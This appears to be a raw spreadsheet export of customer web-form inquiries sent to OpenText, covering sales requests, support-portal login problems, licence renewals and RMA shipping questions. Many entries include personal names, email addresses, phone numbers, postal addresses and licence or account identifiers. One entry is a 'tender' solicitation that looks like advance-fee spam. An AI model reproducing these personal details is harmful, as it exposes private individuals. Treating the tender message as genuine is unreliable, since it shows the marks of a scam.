I am reaching out to see who I may talk to regarding OpenText's community involvement and what type of initiatives you support. Recess Guardians is making a huge impact across Canada by helping less youth be bullied, and having more of them take on a leadership role that will make a difference in their communities for years to come.  In the next 3-years we will be working with over 4,000 Canadian schools, and are now branching out into all 50 US states. I believe we would be a great organization for you to get behind and I would love to jump on a 5-10 minute call with someone._x000D_
_x000D_
Thanks for your time._x000D_
_x000D_
Mike</t>
  </si>
  <si>
    <t>I am a legacy Teleform holder Serial#802718 my version of Teleform suddenly stopped working with an error message SQL server does not exist, how do I resolve tis please.</t>
  </si>
  <si>
    <t>KH</t>
  </si>
  <si>
    <t xml:space="preserve">I have a shrink-wrapped Gupta product from 1996 (unused). I wondered if you know of anyone who is curating a software museum or suchlike who might want it.  I also have course notes from Unify/Accell/SQL training, having been a one-time developer in this technology._x000D_
Any info would be welcome._x000D_
kind regards_x000D_
K Hayter </t>
  </si>
  <si>
    <t>Dear,_x000D_
 _x000D_
RMA Department – What is the shipping information (tracking number – shipping company – Expected Date of arrival/Shipping method)? It helps us coordinate resources to be onsite when the item arrives by knowing these details._x000D_
_x000D_
Part #:  1000019666 - Fax Gateway 304, Analog Fax Gateway, 4FXO SIP/T.38 - S-CPFG304A4R_x000D_
S/N:      ACD135238-1_x000D_
_x000D_
 OTCS Ticket 3986884 - Open Text Fax Server Advanced Replacement RMA_x000D_
 _x000D_
_x000D_
 _x000D_
Also, please include Craig Anderson – he is the IT director for this customer and Toshiba the reseller work closely with them.</t>
  </si>
  <si>
    <t>Sales Position</t>
  </si>
  <si>
    <t>CANNOT LOG IN GXS CATALOGUE, Please help ASAP</t>
  </si>
  <si>
    <t xml:space="preserve">I want to confirm that George Tsivaras and Taryn Del Rio work for Open Text.  We receive a lot of phishing emails and spam and I want to be certain that the renewal contract I received is legitimate.  </t>
  </si>
  <si>
    <t>Upgrade old version of BI Query</t>
  </si>
  <si>
    <t>Pricing information</t>
  </si>
  <si>
    <t>BArbados is currently aggressively moving to transform its government and will be moving towards document management.  A few years ago we were in touch with OpenText where we had won a contract for the Queen Elizabeth Hospital but my partner died leading to complications._x000D_
_x000D_
Please contact soonest to discuss the upcoming opportunities</t>
  </si>
  <si>
    <t>looking for pricing for a one time after hours support engineer to assist during a server migration.....the shared services servers are already configured... just need an engineer on stand by for any problems that may arise because we have just business hours support....</t>
  </si>
  <si>
    <t>Darran Skinner who managed our account has left the company.  I need to take over his access.  How can I get a password ASAP so I can access our account to input Kohl's UPC information.  I believe our user ID was JA223G.</t>
  </si>
  <si>
    <t>Nessi does SAP implementations (S/4 HANA, SAP Busienss By Design). We have a customer opportunity where xECM OpenText is in scope so I was looking for more information in regards to the hardware requirements for xECM OpenText for SAP. Couldn't find it so I was thinking it is most likely available within "support" section of OpenText website for this product.</t>
  </si>
  <si>
    <t>I am doing research for a client for product selection.  We have a very short fuse.  Can we talk today?</t>
  </si>
  <si>
    <t>Looking for EIM and Discovery tools for Real Estate and Lease Extractions</t>
  </si>
  <si>
    <t>I need access to the Content Suite product line to get an overview of the product, but It seems something goes wrong when I log in. I need access to:_x000D_
* Learning Central_x000D_
* Learning services_x000D_
* Training and Certification - Learning Part Options_x000D_
_x000D_
EVRY NORGE AS has a partner _x000D_
agreement with OpenText.</t>
  </si>
  <si>
    <t xml:space="preserve">Options around fully managed service of our streamserve environment </t>
  </si>
  <si>
    <t>Looking for Output Transformation-Server &amp; designer training</t>
  </si>
  <si>
    <t>Hi!_x000D_
_x000D_
I tried to change the e-mail address of my account (from sander.lepik@cooppank.ee to ithaldus@cooppank.ee) and now I'm locked out as neither of the e-mail addresses are valid for login. With both address I see an error message that suggests to contact.</t>
  </si>
  <si>
    <t>purchase encase mobile investigator</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText Support Team,_x000D_
_x000D_
Our company, Philips Healthcare, is interested in an electronic DHF solution for our projects. _x000D_
I am responsible for the evaluation and introduction of the electronic DHF solution. I would like to have more information about your product and a trial version for evaluation, in order to discover if it fits our needs._x000D_
	_x000D_
Please contact me at your earliest convenience._x000D_
_x000D_
Best regards!_x000D_
_x000D_
Christian Bindiu_x000D_
Project Owner_x000D_
</t>
  </si>
  <si>
    <t>Dear Sirs,_x000D_
_x000D_
We are planning the implementation of SAP VIM with ROFF, and we need to have a proposal for the Opentext licensing._x000D_
_x000D_
We are looking for your answer_x000D_
Manuela Caldeira</t>
  </si>
  <si>
    <t>Request for Discussion on Business Rules Management System Market</t>
  </si>
  <si>
    <t>I would like information regarding prices and licensing for Exceed.</t>
  </si>
  <si>
    <t>Don't open support pages. Our "account does not grant you access to this resource". But the account was granted earlier.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Opentext team,_x000D_
_x000D_
I am contacting you to obtain pricing information for 500 users of Opentext ECM. What pricing possibilities do you offer?_x000D_
_x000D_
Best regards_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir möchte gerne unsere MS SQL-Server-Landschaft modernisieren und konsolidieren._x000D_
_x000D_
Für die bei Ihnen bezogene Anwendung Rightfax betreiben wir auch einen MS SQL Server. _x000D_
_x000D_
Können Sie uns mitteilen, welches die älteste unterstützte Version (z. B. 2008 R2) ist und welches die neueste (z. B: 2019)? Welche Abhängigkeiten bestehen zur Version von Rightfax? Wenn Sie eine Dokumentation der Systemanforderungen bezüglich des SQL-Servers haben, lassen Sie uns diese bitte zukommen._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Mirko Scholz_x000D_
</t>
  </si>
  <si>
    <t>I cannot confirm the registration of my account to access My Support. it showed "Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us.", after I did the confirmation the link in registration confirmation email.</t>
  </si>
  <si>
    <t>I cannot confirm the registration of my account to access My Support</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Nous disposons d'une vieille version d'eDocs ( 5.3) : notre parc migrant doucement vers windows 10 nous nous devons de faire evoluer cette GED obsolete (qui ne fonctionneras pas avec windows 10).</t>
  </si>
  <si>
    <t>Previously i had access to documentum knowledge base page/ My Support, raising tickets etc. I dont understand why the above access is removed from my account.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind bei der Suche nach einem Print / Output Management-System auf Ihr Produkt „OpenText Output Management“ gestoßen._x000D_
_x000D_
Unsere Anforderungen an ein solches System wären:_x000D_
-	Zentrales Print Management System_x000D_
-	Für SAP und nicht-SAP-Systeme_x000D_
-	Soll sowohl Label als auch Laser-/Multifunktionsgeräte unterstützen_x000D_
-	Schachtsteuerung aus SAP_x000D_
_x000D_
Über eine kurze Rückmeldung würden wir uns freuen um das Produkt evtl. auch gemeinsam testen zu können._x000D_
Rückmeldungen bitte an Alexander Weiz (Tel.: 07940 / 1096 985; alexander.weiz@burkert.com)._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Andreas Gockner_x000D_
_x000D_
Bürkert Fluid Control Systems_x000D_
Bürkert Werke GmbH &amp; Co. KG_x000D_
Andreas Gockner_x000D_
IT / SAP_x000D_
Kaufmännischer Auszubildender_x000D_
Christian-Bürkert-Straße 13-17_x000D_
74653 Ingelfingen_x000D_
andreas.gockner@burkert.com_x000D_
_x000D_
Diese Mitteilung erfolgt vertraulich und nur zum Gebrauch durch den oder die Adressaten. Sie kann durch das gesetzliche Berufs-, Amts- oder Geschäftsgeheimnis geschützte Informationen enthalten. Sollte sie irrtümlich an Sie erfolgt sein, dürfen Sie die erhaltenen Informationen weder nutzen noch offen legen. Bitte benachrichtigen Sie uns gegebenenfalls telefonisch oder mit Antwort-Mail, und löschen Sie diese Nachricht und alle Anhänge dazu unverzüglich. Vielen Dank._x000D_
_x000D_
The contents of this e-mail and any attached files are confidential and only for the use of the addressee. No one else may copy, forward, disclose or use all or any of it in any form. If you are not the intended recipient, please notify us immediately by e-mail or telephone and delete this e-mail from your system. Thank you._x000D_
_x000D_
Les informations contenues dans ce message sont confidentielles. Elles sont exclusivement réservées au destinataire de ce message. Si vous deviez recevoir ce mail par erreur, veuillez prévenir l'expéditeur par téléphone ou par retour de mail, et supprimer le message de votre système. Merci._x000D_
_x000D_
Bürkert Werke GmbH &amp; Co. KG_x000D_
Kommanditgesellschaft; Sitz Ingelfingen; Registe</t>
  </si>
  <si>
    <t>tell me more abiut this</t>
  </si>
  <si>
    <t xml:space="preserve">I need Encase software for my organization. Also training for it and few other items as needed. </t>
  </si>
  <si>
    <t>My company is looking for an intranet solution.</t>
  </si>
  <si>
    <t xml:space="preserve">We are searching for the Document management system. Khan bank is the largest bank in Mongolia with a total of 2.4 million customers. Our employers working on the update for customer information every day. We have spent a lot of time this process and not security. _x000D_
 </t>
  </si>
  <si>
    <t>it is not possible to download gupta report builder from the linkage in PO. please contact me as soon as possible._x000D_
thank you!</t>
  </si>
  <si>
    <t>Our bill is incorrect.  I have called several time and left messages.  Please contact me.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Request meeting/ call/ demo to learn more about OpenText Learnflex. </t>
  </si>
  <si>
    <t xml:space="preserve">Existing right fax customer... interested in learning about a cloud hosted option.  </t>
  </si>
  <si>
    <t xml:space="preserve">interested in a demo of opentext.  </t>
  </si>
  <si>
    <t>Need access to MySupport section. I work for Walmart Stores Inc Bentonville.</t>
  </si>
  <si>
    <t>Please link my account to OpenText Support.  VPS #: 02254-12423</t>
  </si>
  <si>
    <t>Requesting a sales contact to schedule demonstration at our office located at 471 Intermodal Drive. Brampton, Ontario. We are evaluating 3 vendors for our Content Services Platform.</t>
  </si>
  <si>
    <t>We are in the preliminary stage of looking into Desktop Faxing.  We would like to schedule a demo of what OpenText products can do with regards to desktop faxing.  Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
I work in the Director’s Office of the U.S. Office of Personnel Management (OPM), and maintain the agency’s Document Management System (DMS).  The DMS was created in 2005 by Metastorm, which I believe is now owned by OpenText.  As you can imagine, the system is quite old, and is badly in need of both maintenance and updating.  There are many functions of the current system that have stopped working, which obviously slows down everyone’s work, and has forced us to make work-arounds.  So we’d like to speak to someone regarding both short-term and long-term goals:_x000D_
_x000D_
•	In the short-term, what would it take to perform maintenance on the current system to get it back up and fully-functional?  Is that even possible considering the age of the system?_x000D_
•	In the long-term, what would it take to fully update the system to 2018 specs?_x000D_
_x000D_
We are primarily concerned with retaining the data archives of the current system, and also ensuring that the current system does not collapse before a new system is in place.  I want to stress that while we are certainly interested in a new system, we really do want to discuss the possibility of getting some maintenance on the old system to keep it going while something new is developed.  Thanks!_x000D_
_x000D_
Steve Hickman_x000D_
Deputy Executive Secretary, Office of the Director_x000D_
U.S. Office of Personnel Management_x000D_
1900 E Street NW, Room 5534_x000D_
Washington, DC 20415_x000D_
202-606-1973_x000D_
stephen.hickman@opm.gov_x000D_
</t>
  </si>
  <si>
    <t>It seems our password has expired/changed and the GXS contact is no longer with St. John.  I need to be added to the profile._x000D_
Thank you,_x000D_
Angela Platt</t>
  </si>
  <si>
    <t>Please tell me what version is required to support TLSv1.2</t>
  </si>
  <si>
    <t>I would like to get in contact with someone from the sales team to explore an option of using OpenText as our possible new CMS for the organization._x000D_
I have already made an inquiry last week, but I have not heard back yet._x000D_
So if you can get back to me, it would be much appreciated._x000D_
_x000D_
Thank You,_x000D_
Ognjen.</t>
  </si>
  <si>
    <t>requesting a quote _x000D_
  Department of Navy_x000D_
  City:  DAHLGREN    State:  VA    Zip:  22448_x000D_
OPEN TEXT EXCEED "QTY 5"</t>
  </si>
  <si>
    <t>I am just reaching out to get a renewal quote for our academic licenses we currently have. They don't expire until around December 6th, but I am wanting to get a head start on planning ahead. _x000D_
_x000D_
We currently have 2 network license dongles, one with 14 licenses and the other with 5. I would want to keep everything as it currently is, except add 5 more licenses to the 14 license dongle. So I would have one dongle with 19 licenses on it and the other with 5 licenses on it. _x000D_
_x000D_
If anything has changed in the program that I should be aware of, just let me know._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>I am trying to update my EnCase Codemeter dongle, but I can't get to your support website.  Any help is greatly appreciated.</t>
  </si>
  <si>
    <t>Please provide certificates for my encase dongles.</t>
  </si>
  <si>
    <t>ACTION OF CHANGING MY PASSWORD HAS FAILED</t>
  </si>
  <si>
    <t>Could be please schedule a demo?</t>
  </si>
  <si>
    <t>Hello,_x000D_
My name is Nicholas Davis and I work at the Gold's Gym in Germantown, MD on North Frederick Rd. Here at Gold's Gym, we are giving back to the Montgomery County community by offering a FREE Bootcamp class (on-site or off-site) for the employees of local organizations such as OpenText._x000D_
_x000D_
We also offer for OpenText:_x000D_
- Discounted Group Rates for monthly membership for the employees of OpenText._x000D_
- A table day at our gym in Germantown to promote your organization at our Open House events where we hold a FREE Bootcamp class and invite everyone in the neighborhood to come and participate._x000D_
_x000D_
Let me know if any of these options interest your company.</t>
  </si>
  <si>
    <t>Cannot get access to "My Support". I Clicked "Request Confirmation Email", received the confirmation email, clicked "Confirm Registration", then logged in again and read "If you requested My Support access; you will receive an email notification from your OpenText Support representative with confirmation." Access to "My Support" still does not work, I always get back to the page with "Request Confirmation Email". I tried this several times in the last weeks but never got an email notification from an OpenText Support representative with confirmation._x000D_
We have a FirstClass Server (serial number: 1010417) with a valid maintainence agreement. Please tell me how to proceed._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Ottmar Kotheimer_x000D_
Schuzle Schloss Salem gGmbH_x000D_
IT-Administration</t>
  </si>
  <si>
    <t>can you tell me what would be the equivalent software OpenText has that would replace Spicer Imagenation SCAN VME?</t>
  </si>
  <si>
    <t>We have started working with new Trading Partners that require us to have our UPC Catalog available via GXS. I'd like to get more information on pricing and how to get started with setting up an account. The best method of contact will be email, as I will be traveling this week. I look forward to your reply._x000D_
_x000D_
Thanks,_x000D_
Erik Worley</t>
  </si>
  <si>
    <t>I am interested in the OpenText GISLink Module for ESRI on Content Server. Specifically, I would like to know all costs associated with acquiring and running the module. Thanks, Alex.</t>
  </si>
  <si>
    <t xml:space="preserve">-URGENT- Requesting a quotation for RFQ 105188 (Department of Navy)_x000D_
_x000D_
Good Morning,_x000D_
_x000D_
We are requesting a re-sellers quote for the items listed below. This_x000D_
is on behalf of our government client at the Department of Navy. Please include Payment terms (NET30) and quote expiration on_x000D_
the quote. Please feel free to reach out to me if you have any_x000D_
questions or concerns._x000D_
_x000D_
OPEN TEXT EXCEED "QTY 5" </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Madam or Sir,_x000D_
we have databases with Gupta 9  and Unify SQLBase 11.5 running. I need ODBC drivers to connect to the databases from linux systems (CentOS 7), but "support. guptatechnologies. com" is offline/not available. Where can i find the drivers for download? Thank you in advance! Sven Beuermann_x000D_
</t>
  </si>
  <si>
    <t>Need contact info for sales</t>
  </si>
  <si>
    <t>We are evaluating electronic systems for QMS and other modules and would like to learn more. we have budget allocated for 2019 so we are starting our evaluation process now, can someone please reach out as soon as possible to talk more about your product offerings?  Thank you in advance, Melissa Bedarian</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
Please let me know the latest security patch which wil support the installed application version. The version of Documentum Administrator is 7.1 and the version of Content Server is 7.1_x000D_
Thanks _x000D_
Sanchay Sahni</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
Please let us know the support validity for Vodafone Americas ?_x000D_
_x000D_
Thanks &amp; Regards_x000D_
Sanchay Sahni</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, hiermit möchte ich um einen OpenText Account und einen Zugang zum Knowledge Center bitten. Rechte bitte analog zu denen meiner Kollegen Frank Schewe und Leonhard Bröning._x000D_
Mit freundlichen Grüßen_x000D_
Tobias Unruh_x000D_
 -- _x000D_
Tobias Unruh _x000D_
Engineer_x000D_
Infrastruktur und Betrieb_x000D_
GESIS Gesellschaft für Informationssysteme mit beschränkter Haftung_x000D_
Eisenhüttenstraße 99_x000D_
38239 Salzgitter_x000D_
Telefon +49 5341 21-7137_x000D_
Mobil    +49 15140609775</t>
  </si>
  <si>
    <t>Herbalife requires a direct contact to begin discussion on enterprise contracts management and RFx platform solutions. Please reach out via email to austinsm@herbalife.com</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
Please let us know till when is the support contract valid for Vodafone Americas ?_x000D_
_x000D_
Thanks_x000D_
Sanchay Sahni</t>
  </si>
  <si>
    <t>Hej,_x000D_
jag undrar om ni har möjlighet att skicka kommande fakturor till höganäs Ab som PDF-filer via mail? kundnummer: 10028630_x000D_
_x000D_
mailadress: reskontraHAB@hoganas.com_x000D_
_x000D_
Vänlig hälsning,_x000D_
Amelie Johnson_x000D_
Ekonomiavdelningen _x000D_
Höganäs AB</t>
  </si>
  <si>
    <t>Inköp av system Content Service Platform. Digitalisera avtalsflöde samt dokumenthantering</t>
  </si>
  <si>
    <t>We have an agreement and we need to have access to Download technical documentation from Exstream for salesforce._x000D_
My contacts from Opentext are: Moritz Hertler;Johan Rydmark;Vaibhav Pradip Pande;</t>
  </si>
  <si>
    <t>Hi,_x000D_
I verified my account but it does not let me download the latest version (8.07) of Encase Forensics._x000D_
Can you guys let me know what is the problem or send me a link that i can use to download the software?_x000D_
My license number is: V667513227_x000D_
Please response asap. Thanks</t>
  </si>
  <si>
    <t>GI</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
als international tätiges Unternehmen im Bereich Kupfer und Kupferlegierungen beschäftigen wir uns aktuell mit dem Thema „Digitale Personalakte“._x000D_
Der Personalbereich plant eine digitale Personalakte an den verschiedenen Standorten unseres Unternehmens im In- und Ausland einzuführen._x000D_
Je nach Standort werden unterschiedliche HCM-Systeme eingesetzt. Frü die digitale Personalakte möchten wir allerdings eine einheitliche Softwarelösung einsetzen._x000D_
_x000D_
Im Moment sind wir dabei unsere Anforderungen an die digitale Personalakte zu definieren und die Software-Lösungen verschiedener Anbieter zu prüfen._x000D_
_x000D_
Gerne würden wir uns deshalb auch die von Ihnen angebotene Softwarelösung anschauen._x000D_
_x000D_
Wäre es möglich, einen Einblick in die Softwarelösung bei einem Termin bei uns vor Ort in Ulm zu erhalten? Zum Beispiel Mitte November?_x000D_
_x000D_
Vielen Dank schon vorab für Ihre Unterstützung._x000D_
</t>
  </si>
  <si>
    <t>I still can't get to my tickets page on your support and can not register my product _x000D_
also I can't see  my products list. _x000D_
To get into your support system it takes me since end of August, when I tried to get urgent support and access to KB. _x000D_
TVZ has valid edu contract with GuidanceSoftware for more than 2 years, _x000D_
we are using for  education in digital forensics and security, actually creating to you _x000D_
your new customers. _x000D_
Our dongle ID is G3002086435 order no: 944986. _x000D_
Since SMS expires on 22/03/19 09:00:00 I expect from you to extend our SMS period for _x000D_
all this time while we were cut off from support service and all other services defined in contract. _x000D_
_x000D_
Damir Delija</t>
  </si>
  <si>
    <t>We would like to have a Trial of open text capture solution because one of our customer uses it and we need an integration. This will be of a mutual benefit for both of us.</t>
  </si>
  <si>
    <t>CK</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
I am an engineer in charge of a local cluster and we are currently considering a system migration from RHEL6.3 to RHEL7.4. The current remote access solution to this machine is your OpenText Exceed onDemand 8 software for which we got the sources and a license maintenance for one year when the cluster was installed. _x000D_
Here are a few questions regarding the desired migration:_x000D_
-	Is the “Exceed onDemand 8” software maintained for RHEL7.4 Linux distribution ?_x000D_
-	Should we consider purchasing the “OpenText Exceed on Demand Turbo X” solution for that purpose ?_x000D_
-	Can we get a cost estimate to purchase 5 licenses of the appropriate solution ?_x000D_
_x000D_
Kind regards,_x000D_
Florian Euzenat</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for someone serious long term relationship </t>
  </si>
  <si>
    <t>SH</t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону 8 (495) 646-70-38  Виктор</t>
  </si>
  <si>
    <t>I've a project about DRM solution. Please email for me price calculation is perpetual or Subscription. Because my customer need price License Perputual. Please let me known information about this solution, features and Perputual license/user. Thanks team</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren, _x000D_
_x000D_
wir sind für einen unserer Kunden auf der Suche nach einer Rules Engine und sind auf Sie aufmerksam geworden. Wäre es möglich, uns folgende Informationen Ihrer Lösung per E-Mail zukommen zu lassen: _x000D_
_x000D_
-	Produktbroschüre_x000D_
-	Referenzen_x000D_
-	Standard Preisliste_x000D_
-	Technisches Whitepaper_x000D_
_x000D_
Ebenfalls sind wir an einer Demo-Version interessiert. _x000D_
_x000D_
Vielen Dank im Voraus für Ihre Bemühungen. _x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Julia Peters_x000D_
Consulting &amp; Service_x000D_
</t>
  </si>
  <si>
    <t>Herzliche Geburtstagsglückwünsche an Rainer Ehre - Alles Gute zum 60. Geburtstag! Vielen Dank fürs Weiterleiten der Glückwünsche! Annette Endres</t>
  </si>
  <si>
    <t>Document Management System</t>
  </si>
  <si>
    <t>Seeking licence, implementation &amp; training costs for inclusion in a client technology roadmap.</t>
  </si>
  <si>
    <t xml:space="preserve">Im approved </t>
  </si>
  <si>
    <t xml:space="preserve">I am an instructor in the Cerritos College Paralegal Studies program. I am teaching a class on e-discovery and want to obtain a video or print information that will demonstrate how your product works. </t>
  </si>
  <si>
    <t>Clarification. Can you please tell if the "DF 210 " course uses Encase 8?_x000D_
thanks.</t>
  </si>
  <si>
    <t>I have had fax2mail account for over 10 years. Now it is not forwarding faxes to me, nor can I sign into my account. Please correct as soon as possible._x000D_
Barry Hirsch</t>
  </si>
  <si>
    <t>for job as a fresher</t>
  </si>
  <si>
    <t>Confirmation of my email ist not working</t>
  </si>
  <si>
    <t>Sir I forgot my I'd&amp; password</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Kindly advise if you have distributor in Singapore._x000D_
If no, can NCS Pte Ltd purchase renewal directly from you?_x000D_
_x000D_
Please provide renewal quote for:_x000D_
Encase Id: G3002085201, G3002085202, G3002085198, G3002085199, G3002085200 _x000D_
Mobile Investigator: X100008114859, X100008114901, X100008114953, X100008115016, X100008119104;_x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards,_x000D_
Janet Lee</t>
  </si>
  <si>
    <t xml:space="preserve">My agency is soliciting a new Invoice Management solution and I'd like to hear if your company offers a product/solution that might suit our needs in the areas of invoice data capture, workflow, digital image and storage. _x000D_
_x000D_
Thanks and I look forward to hearing from you. _x000D_
_x000D_
Regards,_x000D_
Heather </t>
  </si>
  <si>
    <t xml:space="preserve">We've used the Magellen RoadMate GPS successfully, UNTIL NOW. When we activate the the RoadMate, we cannot get it to work. How do we get it to work. lease respond ASAP._x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
 I have successfully confirmed my email address several times but I keep getting the "Almost there!" message stating that I have not yet confirmed. Thank You</t>
  </si>
  <si>
    <t>We have Exceed onDemand servers running on Windows. Is there an EoD host/server version that runs on RHEL6/7 ?_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Hello Team!_x000D_
_x000D_
We are currently engaged with one of the largest bio-pharmaceutical organizations in the world (We can reveal the client’s name on request). They are looking for Document review/e-discovery service providers in the United States. We have shortlisted your esteemed organization based on our secondary research and would like to gain more insights about your offerings and service capabilities._x000D_
_x000D_
We request you to share the contact person details for further communication on this project_x000D_
_x000D_
Hope to hear from you soon!</t>
  </si>
  <si>
    <t>Ok so someone hacked my Facebook and iPhone so I activated an app called........anyway they have stolen data from me along with several other things. Pls contact me and let me know what I can do about this situation bc I know she’could get in serious trouble for hacking</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to get a budgetary quotation for the following:_x000D_
1. EXCEED - 1000 Licenses_x000D_
2. NFS Client - 1000 Licenses_x000D_
3. EXCEED 3D - 25 Licenses_x000D_
What's the approximate annual license fees? Does it include email/phone support? Is updates included? </t>
  </si>
  <si>
    <t>To whom may it concern,_x000D_
_x000D_
My name is Mori from H.I.S. Hawaii._x000D_
I just took over the branch manager position this month._x000D_
I wanted to know for what service are we getting charged for and what kind of service is included in this charge._x000D_
Billing Account: WVLA079003_x000D_
Monthly Easy Itinerary Charge: $9.95_x000D_
Local Taxes Payable: $0.47_x000D_
Total Open Text Inc.: $10.42_x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Necesito la clave de producto (licencia) de nuestro DM </t>
  </si>
  <si>
    <t>Hello,_x000D_
On behalf of Los Angeles Tourism and Convention Board, I would like to invite you to participate in a software selection RFP pursuit for the Digital Asset Management solution._x000D_
_x000D_
Regards_x000D_
Vijay</t>
  </si>
  <si>
    <t>I want to create to register for the support site and my company WasteMangement Inc has support. our customer id is 10473879. Please let me know or provide me the access to support site.</t>
  </si>
  <si>
    <t>We have a client that is using Teleform and LiquidOffice.  I am looking for an account executive from OpenText to discuss options for our client.</t>
  </si>
  <si>
    <t>Looking for a possible new solution. Thanks!</t>
  </si>
  <si>
    <t>I get the:_x000D_
"Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us."_x000D_
_x000D_
No matter how many times I confirm my address. I need my Encase licens urgently._x000D_
_x000D_
Regards _x000D_
/Daniel</t>
  </si>
  <si>
    <t>Error trying to run Documentum IRM Client for PDF</t>
  </si>
  <si>
    <t>Emergency services please contact me</t>
  </si>
  <si>
    <t xml:space="preserve">Hi I do data entry at Rooms To Go in Seffner, Florida, which is near Tampa Florida. I would like to take an introductory course in open text. What would you recommend? Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for Documentum training for my renewal team (non-technical) </t>
  </si>
  <si>
    <t>Looking for EDMS for the transportation industry. I would appreciate if someone from sales could call me at 9164310913. I will be providing your sales with an excel capability info questionnaire. We are working on a large scale project.</t>
  </si>
  <si>
    <t xml:space="preserve">We are getting many failed faxes. I have restarted the Right Fax Express and it hasn't improved the faxing out rate._x000D_
_x000D_
The error message being reported to the Intergy EMR is: Final Call Progress Quiet(T.30 timeout). Also getting errors stating Final Call Progress: Dial Tone _x000D_
What can be done to remedy these errors and get a better sent rate?_x000D_
The Purchase was under the name Boca Nephrology, 7900 N Military Trl STE 195, Boca Raton FL 53431 and was purchase May 8, 2018. </t>
  </si>
  <si>
    <t xml:space="preserve">I need to change our company name and address for billing purposes. </t>
  </si>
  <si>
    <t>Looking to renew Open Text Exceed (QTY5) Adding my supervisor to this since today is my last day here. His name is Michael Ryder and can be reached at 540-284-0421  michael.ryder.ctr@navy.mil</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
I am looking for any information on if OpenText has subcontractors available for 1-3 month projects - specifically for OpenText Provision.  We are looking for an expect in Provision who can help model our business process in the software. </t>
  </si>
  <si>
    <t xml:space="preserve">Do you offer a partner program? Our service matches customers to the best solution(s) for them based on their specific needs. We would like to offer your solution and send you qualified leads. </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je souhaite être contacter par Mr.DUFOUR_x000D_
_x000D_
Cordialement</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
The current connection between Panalpina and GXS (Geis) is OFTP1._x000D_
We would like to move it to OFTP2 as ISDN is going to decommission in Germany soon._x000D_
_x000D_
Thanks,_x000D_
Afsar Shaikh</t>
  </si>
  <si>
    <t>RE-NOTICE INVITING TENDER" 2018/19_x000D_
_x000D_
Dear: Ceo,sir,madam,_x000D_
_x000D_
I read about your company information through google search and i wish to inform_x000D_
you about a new Tender Supply of various machinery/ Laser Machines etc.for the on-going project in ACCRA GHANA with African Union Project Authority. and I am certain_x000D_
I would make a valuable contribution in your company to win this Tender_x000D_
supply. if your interested send your product brochure for presentation and _x000D_
let us have appointment by phone or email so that i can give you more details_x000D_
on how to proceed with (AFRICAN UNION PROJECT AUTHORITY.) (ECOWAS REGION)_x000D_
_x000D_
Regards,_x000D_
Dr. williams k.declane,_x000D_
Dr.williamsdeclane@gmail.com_x000D_
No. 33 Tema Road,_x000D_
Comm. 11, Spintex,Road_x000D_
Accra - Ghana._x000D_
Tel: +233579467953</t>
  </si>
  <si>
    <t>Looking for large development projects</t>
  </si>
  <si>
    <t>I have not managed to get the software I was trying to procure from you, so please refund my money (paid late August) by return._x000D_
_x000D_
Please delete all my information from your system once the refund is made._x000D_
_x000D_
Regards,_x000D_
Alan Glass</t>
  </si>
  <si>
    <t>looking for job , going outside country</t>
  </si>
  <si>
    <t>Hi_x000D_
We bought 2 Encase licenses from Guidance Software (with dongle) and its support finished at 03.2016. We have dongles but software lost. If you can give me a download link for my dongles, I'll be glad. Thanks for your help. Best regards.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
bitte senden Sie mir für die JENOPTIK Optical Systems GmbH ein Angebot über folgende Software:_x000D_
_x000D_
•	OpenText Capture Center_x000D_
•	Einzellizenz_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Karsten Linke</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
_x000D_
ich hätte gerne Plans &amp; Pricing Informationen zu OpenText Information Hub, speziel Analytics Designer und interactives BIRT Reporting. Gern ohne viel Key-Account Management und Verkaufgespräche. Die Frage die es zu Beantworten gilt ist, ob die zu erwartende Kostendimension überhaupt eine weitere Evaluation rechtfertigt._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Xyan Kruse_x000D_
_x000D_
Knuddels GmbH &amp; CO. KG</t>
  </si>
  <si>
    <t>Hi,_x000D_
My name is Mikkel Thordal Andersen, and im writing on behalf of Nykredit Bank in Denmark. I was in contact with you guys a couple of weeks ago because of out interest in your Advanced Recognition Technologies, more specifically software to do image classification and OCR in pictures/scanned documents. We agreed to talk again after my holiday. I would be awesome if you can call me hopefully today?_x000D_
_x000D_
Thank you!_x000D_
_x000D_
Kind regards,_x000D_
